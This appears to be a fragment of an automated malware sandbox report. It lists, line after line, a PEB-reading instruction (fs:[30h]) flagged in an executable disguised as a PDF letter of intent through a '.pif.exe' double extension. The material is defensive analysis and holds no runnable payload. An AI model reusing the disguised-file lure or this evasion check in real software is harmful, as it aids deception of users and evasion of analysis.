            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303F525 mov eax, dword ptr fs:[00000030h]2_2_3303F525
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304B52F mov eax, dword ptr fs:[00000030h]2_2_3304B52F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33065537 mov eax, dword ptr fs:[00000030h]2_2_33065537
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F874B0 mov eax, dword ptr fs:[00000030h]2_2_32F874B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F874B0 mov eax, dword ptr fs:[00000030h]2_2_32F874B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC34B0 mov eax, dword ptr fs:[00000030h]2_2_32FC34B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303B550 mov eax, dword ptr fs:[00000030h]2_2_3303B550
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303B550 mov eax, dword ptr fs:[00000030h]2_2_3303B550
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303B550 mov eax, dword ptr fs:[00000030h]2_2_3303B550
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B480 mov eax, dword ptr fs:[00000030h]2_2_32F8B480
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F99486 mov eax, dword ptr fs:[00000030h]2_2_32F99486
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F99486 mov eax, dword ptr fs:[00000030h]2_2_32F99486
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301B594 mov eax, dword ptr fs:[00000030h]2_2_3301B594
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301B594 mov eax, dword ptr fs:[00000030h]2_2_3301B594
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F91460 mov eax, dword ptr fs:[00000030h]2_2_32F91460
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F91460 mov eax, dword ptr fs:[00000030h]2_2_32F91460
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F91460 mov eax, dword ptr fs:[00000030h]2_2_32F91460
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F91460 mov eax, dword ptr fs:[00000030h]2_2_32F91460
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F91460 mov eax, dword ptr fs:[00000030h]2_2_32F91460
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FAF460 mov eax, dword ptr fs:[00000030h]2_2_32FAF460
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FAF460 mov eax, dword ptr fs:[00000030h]2_2_32FAF460
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FAF460 mov eax, dword ptr fs:[00000030h]2_2_32FAF460
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FAF460 mov eax, dword ptr fs:[00000030h]2_2_32FAF460
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FAF460 mov eax, dword ptr fs:[00000030h]2_2_32FAF460
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FAF460 mov eax, dword ptr fs:[00000030h]2_2_32FAF460
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3302D5B0 mov eax, dword ptr fs:[00000030h]2_2_3302D5B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3302D5B0 mov eax, dword ptr fs:[00000030h]2_2_3302D5B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330235BA mov eax, dword ptr fs:[00000030h]2_2_330235BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330235BA mov eax, dword ptr fs:[00000030h]2_2_330235BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330235BA mov eax, dword ptr fs:[00000030h]2_2_330235BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330235BA mov eax, dword ptr fs:[00000030h]2_2_330235BA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9B440 mov eax, dword ptr fs:[00000030h]2_2_32F9B440
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9B440 mov eax, dword ptr fs:[00000030h]2_2_32F9B440
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9B440 mov eax, dword ptr fs:[00000030h]2_2_32F9B440
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9B440 mov eax, dword ptr fs:[00000030h]2_2_32F9B440
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9B440 mov eax, dword ptr fs:[00000030h]2_2_32F9B440
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9B440 mov eax, dword ptr fs:[00000030h]2_2_32F9B440
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304F5BE mov eax, dword ptr fs:[00000030h]2_2_3304F5BE
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330655C9 mov eax, dword ptr fs:[00000030h]2_2_330655C9
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3300D5D0 mov eax, dword ptr fs:[00000030h]2_2_3300D5D0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3300D5D0 mov ecx, dword ptr fs:[00000030h]2_2_3300D5D0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330635D7 mov eax, dword ptr fs:[00000030h]2_2_330635D7
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330635D7 mov eax, dword ptr fs:[00000030h]2_2_330635D7
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330635D7 mov eax, dword ptr fs:[00000030h]2_2_330635D7
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB340D mov eax, dword ptr fs:[00000030h]2_2_32FB340D
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB15F4 mov eax, dword ptr fs:[00000030h]2_2_32FB15F4
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB15F4 mov eax, dword ptr fs:[00000030h]2_2_32FB15F4
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB15F4 mov eax, dword ptr fs:[00000030h]2_2_32FB15F4
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB15F4 mov eax, dword ptr fs:[00000030h]2_2_32FB15F4
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB15F4 mov eax, dword ptr fs:[00000030h]2_2_32FB15F4
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB15F4 mov eax, dword ptr fs:[00000030h]2_2_32FB15F4
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33017410 mov eax, dword ptr fs:[00000030h]2_2_33017410
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB95DA mov eax, dword ptr fs:[00000030h]2_2_32FB95DA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC55C0 mov eax, dword ptr fs:[00000030h]2_2_32FC55C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBF5B0 mov eax, dword ptr fs:[00000030h]2_2_32FBF5B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBF5B0 mov eax, dword ptr fs:[00000030h]2_2_32FBF5B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBF5B0 mov eax, dword ptr fs:[00000030h]2_2_32FBF5B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBF5B0 mov eax, dword ptr fs:[00000030h]2_2_32FBF5B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBF5B0 mov eax, dword ptr fs:[00000030h]2_2_32FBF5B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBF5B0 mov eax, dword ptr fs:[00000030h]2_2_32FBF5B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBF5B0 mov eax, dword ptr fs:[00000030h]2_2_32FBF5B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBF5B0 mov eax, dword ptr fs:[00000030h]2_2_32FBF5B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBF5B0 mov eax, dword ptr fs:[00000030h]2_2_32FBF5B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB15A9 mov eax, dword ptr fs:[00000030h]2_2_32FB15A9
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB15A9 mov eax, dword ptr fs:[00000030h]2_2_32FB15A9
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB15A9 mov eax, dword ptr fs:[00000030h]2_2_32FB15A9
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB15A9 mov eax, dword ptr fs:[00000030h]2_2_32FB15A9
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB15A9 mov eax, dword ptr fs:[00000030h]2_2_32FB15A9
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303B450 mov eax, dword ptr fs:[00000030h]2_2_3303B450
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303B450 mov eax, dword ptr fs:[00000030h]2_2_3303B450
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303B450 mov eax, dword ptr fs:[00000030h]2_2_3303B450
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303B450 mov eax, dword ptr fs:[00000030h]2_2_3303B450
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304F453 mov eax, dword ptr fs:[00000030h]2_2_3304F453
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8758F mov eax, dword ptr fs:[00000030h]2_2_32F8758F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8758F mov eax, dword ptr fs:[00000030h]2_2_32F8758F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8758F mov eax, dword ptr fs:[00000030h]2_2_32F8758F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3306547F mov eax, dword ptr fs:[00000030h]2_2_3306547F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FCB570 mov eax, dword ptr fs:[00000030h]2_2_32FCB570
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FCB570 mov eax, dword ptr fs:[00000030h]2_2_32FCB570
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8B562 mov eax, dword ptr fs:[00000030h]2_2_32F8B562
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FCD530 mov eax, dword ptr fs:[00000030h]2_2_32FCD530
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FCD530 mov eax, dword ptr fs:[00000030h]2_2_32FCD530
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9D534 mov eax, dword ptr fs:[00000030h]2_2_32F9D534
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9D534 mov eax, dword ptr fs:[00000030h]2_2_32F9D534
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9D534 mov eax, dword ptr fs:[00000030h]2_2_32F9D534
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9D534 mov eax, dword ptr fs:[00000030h]2_2_32F9D534
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9D534 mov eax, dword ptr fs:[00000030h]2_2_32F9D534
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9D534 mov eax, dword ptr fs:[00000030h]2_2_32F9D534
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330654DB mov eax, dword ptr fs:[00000030h]2_2_330654DB
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330394E0 mov eax, dword ptr fs:[00000030h]2_2_330394E0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC7505 mov eax, dword ptr fs:[00000030h]2_2_32FC7505
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC7505 mov ecx, dword ptr fs:[00000030h]2_2_32FC7505
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304FB0C mov eax, dword ptr fs:[00000030h]2_2_3304FB0C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8BAE0 mov eax, dword ptr fs:[00000030h]2_2_32F8BAE0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBBADA mov eax, dword ptr fs:[00000030h]2_2_32FBBADA
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33025B50 mov eax, dword ptr fs:[00000030h]2_2_33025B50
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33025B50 mov eax, dword ptr fs:[00000030h]2_2_33025B50
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBDAAE mov eax, dword ptr fs:[00000030h]2_2_32FBDAAE
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9BAA0 mov eax, dword ptr fs:[00000030h]2_2_32F9BAA0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9BAA0 mov eax, dword ptr fs:[00000030h]2_2_32F9BAA0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8FAA4 mov ecx, dword ptr fs:[00000030h]2_2_32F8FAA4
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33033B60 mov eax, dword ptr fs:[00000030h]2_2_33033B60
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33033B60 mov eax, dword ptr fs:[00000030h]2_2_33033B60
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33033B60 mov eax, dword ptr fs:[00000030h]2_2_33033B60
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33033B60 mov eax, dword ptr fs:[00000030h]2_2_33033B60
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33033B60 mov eax, dword ptr fs:[00000030h]2_2_33033B60
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F87A80 mov eax, dword ptr fs:[00000030h]2_2_32F87A80
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F87A80 mov eax, dword ptr fs:[00000030h]2_2_32F87A80
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F87A80 mov eax, dword ptr fs:[00000030h]2_2_32F87A80
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33059B8B mov eax, dword ptr fs:[00000030h]2_2_33059B8B
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33059B8B mov eax, dword ptr fs:[00000030h]2_2_33059B8B
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304FB97 mov eax, dword ptr fs:[00000030h]2_2_3304FB97
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F89A40 mov ecx, dword ptr fs:[00000030h]2_2_32F89A40
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9BA30 mov eax, dword ptr fs:[00000030h]2_2_32F9BA30
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9BA30 mov ecx, dword ptr fs:[00000030h]2_2_32F9BA30
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9BA30 mov eax, dword ptr fs:[00000030h]2_2_32F9BA30
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9BA30 mov eax, dword ptr fs:[00000030h]2_2_32F9BA30
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9BA30 mov eax, dword ptr fs:[00000030h]2_2_32F9BA30
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F9BA30 mov eax, dword ptr fs:[00000030h]2_2_32F9BA30
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBDA20 mov eax, dword ptr fs:[00000030h]2_2_32FBDA20
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBDA20 mov eax, dword ptr fs:[00000030h]2_2_32FBDA20
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301FBDC mov eax, dword ptr fs:[00000030h]2_2_3301FBDC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301FBDC mov eax, dword ptr fs:[00000030h]2_2_3301FBDC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3301FBDC mov eax, dword ptr fs:[00000030h]2_2_3301FBDC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FB9A18 mov ecx, dword ptr fs:[00000030h]2_2_32FB9A18
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8BA10 mov eax, dword ptr fs:[00000030h]2_2_32F8BA10
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304FBF3 mov eax, dword ptr fs:[00000030h]2_2_3304FBF3
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC5A01 mov eax, dword ptr fs:[00000030h]2_2_32FC5A01
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC5A01 mov ecx, dword ptr fs:[00000030h]2_2_32FC5A01
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC5A01 mov eax, dword ptr fs:[00000030h]2_2_32FC5A01
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC5A01 mov eax, dword ptr fs:[00000030h]2_2_32FC5A01
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304FA02 mov eax, dword ptr fs:[00000030h]2_2_3304FA02
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303BA0B mov eax, dword ptr fs:[00000030h]2_2_3303BA0B
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303BA0B mov eax, dword ptr fs:[00000030h]2_2_3303BA0B
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303BA0B mov eax, dword ptr fs:[00000030h]2_2_3303BA0B
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303BA0B mov eax, dword ptr fs:[00000030h]2_2_3303BA0B
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD1BEF mov eax, dword ptr fs:[00000030h]2_2_32FD1BEF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD1BEF mov eax, dword ptr fs:[00000030h]2_2_32FD1BEF
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33037A11 mov edi, dword ptr fs:[00000030h]2_2_33037A11
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3300DA1D mov eax, dword ptr fs:[00000030h]2_2_3300DA1D
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA3BD6 mov eax, dword ptr fs:[00000030h]2_2_32FA3BD6
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA3BD6 mov eax, dword ptr fs:[00000030h]2_2_32FA3BD6
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA3BD6 mov eax, dword ptr fs:[00000030h]2_2_32FA3BD6
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA3BD6 mov eax, dword ptr fs:[00000030h]2_2_32FA3BD6
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FA3BD6 mov eax, dword ptr fs:[00000030h]2_2_32FA3BD6
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F87BCD mov eax, dword ptr fs:[00000030h]2_2_32F87BCD
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F87BCD mov ecx, dword ptr fs:[00000030h]2_2_32F87BCD
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F99BC4 mov eax, dword ptr fs:[00000030h]2_2_32F99BC4
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBDBA0 mov eax, dword ptr fs:[00000030h]2_2_32FBDBA0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBDBA0 mov eax, dword ptr fs:[00000030h]2_2_32FBDBA0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBDBA0 mov eax, dword ptr fs:[00000030h]2_2_32FBDBA0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBDBA0 mov eax, dword ptr fs:[00000030h]2_2_32FBDBA0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBDBA0 mov eax, dword ptr fs:[00000030h]2_2_32FBDBA0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBDBA0 mov eax, dword ptr fs:[00000030h]2_2_32FBDBA0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC9B9F mov eax, dword ptr fs:[00000030h]2_2_32FC9B9F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC9B9F mov eax, dword ptr fs:[00000030h]2_2_32FC9B9F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC9B9F mov eax, dword ptr fs:[00000030h]2_2_32FC9B9F
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33023A78 mov eax, dword ptr fs:[00000030h]2_2_33023A78
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33023A78 mov eax, dword ptr fs:[00000030h]2_2_33023A78
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33023A78 mov eax, dword ptr fs:[00000030h]2_2_33023A78
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33023A78 mov eax, dword ptr fs:[00000030h]2_2_33023A78
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33023A78 mov eax, dword ptr fs:[00000030h]2_2_33023A78
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33023A78 mov eax, dword ptr fs:[00000030h]2_2_33023A78
